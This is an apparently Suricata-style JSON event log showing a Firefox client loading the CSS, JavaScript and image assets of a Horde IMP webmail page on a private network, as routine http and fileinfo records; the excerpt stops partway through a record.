{"timestamp":"2020-02-29T00:01:17.185752+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/mime.css","state":"CLOSED","stored":false,"size":211,"tx_id":2}} {"timestamp":"2020-02-29T00:01:17.193887+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} 
{"timestamp":"2020-02-29T00:01:17.196121+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52644,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855}} {"timestamp":"2020-02-29T00:01:17.200003+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/imple.js","state":"CLOSED","stored":false,"size":1359,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.200688+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566}} 
{"timestamp":"2020-02-29T00:01:17.200986+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568}} {"timestamp":"2020-02-29T00:01:17.190061+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881}} {"timestamp":"2020-02-29T00:01:17.191717+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52642,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733}} 
{"timestamp":"2020-02-29T00:01:17.196294+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52642,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport_utils.js","state":"CLOSED","stored":false,"size":1748,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.202472+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport.js","state":"CLOSED","stored":false,"size":58788,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.197485+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52642,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490}} {"timestamp":"2020-02-29T00:01:17.202713+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408}} {"timestamp":"2020-02-29T00:01:17.203688+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408},"app_proto":"http","fileinfo":{"filename":"\/js\/slider2.js","state":"CLOSED","stored":false,"size":7582,"tx_id":2}} {"timestamp":"2020-02-29T00:01:17.204091+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502}} {"timestamp":"2020-02-29T00:01:17.204245+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52648,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566},"app_proto":"http","fileinfo":{"filename":"\/js\/form_ghost.js","state":"CLOSED","stored":false,"size":4231,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.204602+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195}} {"timestamp":"2020-02-29T00:01:17.204937+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502},"app_proto":"http","fileinfo":{"filename":"\/js\/toggle_quotes.js","state":"CLOSED","stored":false,"size":1054,"tx_id":3}} {"timestamp":"2020-02-29T00:01:17.205221+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316}} {"timestamp":"2020-02-29T00:01:17.207382+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52644,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855},"app_proto":"http","fileinfo":{"filename":"\/js\/contextsensitive.js","state":"CLOSED","stored":false,"size":12330,"tx_id":0}} 
{"timestamp":"2020-02-29T00:01:17.207751+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52644,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108}} {"timestamp":"2020-02-29T00:01:17.208069+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52648,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195},"app_proto":"http","fileinfo":{"filename":"\/js\/jstorage.js","state":"CLOSED","stored":false,"size":14289,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.208265+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275}} 
{"timestamp":"2020-02-29T00:01:17.209288+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316},"app_proto":"http","fileinfo":{"filename":"\/js\/dialog.js","state":"CLOSED","stored":false,"size":4046,"tx_id":4}} {"timestamp":"2020-02-29T00:01:17.209615+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763}} {"timestamp":"2020-02-29T00:01:17.210390+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52642,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/passphrase.js","state":"CLOSED","stored":false,"size":1009,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.212241+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52648,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275},"app_proto":"http","fileinfo":{"filename":"\/js\/redbox.js","state":"CLOSED","stored":false,"size":4234,"tx_id":2}} {"timestamp":"2020-02-29T00:01:17.212481+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962}} 
{"timestamp":"2020-02-29T00:01:17.213145+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52644,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/tinycon.js","state":"CLOSED","stored":false,"size":8214,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.213800+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/imp.js","state":"CLOSED","stored":false,"size":5736,"tx_id":5}} {"timestamp":"2020-02-29T00:01:17.219337+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpcore.js","state":"CLOSED","stored":false,"size":13894,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.219999+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980}} {"timestamp":"2020-02-29T00:01:17.222526+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":27623},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpbase.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.223043+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 
(X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030}} {"timestamp":"2020-02-29T00:01:17.253333+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52642,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927}} {"timestamp":"2020-02-29T00:01:17.257292+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744}} {"timestamp":"2020-02-29T00:01:17.257320+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52644,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401}} {"timestamp":"2020-02-29T00:01:17.273323+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363}} {"timestamp":"2020-02-29T00:01:17.276605+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/search-topbar.png","state":"CLOSED","stored":false,"size":363,"tx_id":2}} {"timestamp":"2020-02-29T00:01:17.276888+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191}} {"timestamp":"2020-02-29T00:01:17.279412+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/popdown.png","state":"CLOSED","stored":false,"size":191,"tx_id":3}} {"timestamp":"2020-02-29T00:01:17.321425+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:01:17.365360+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
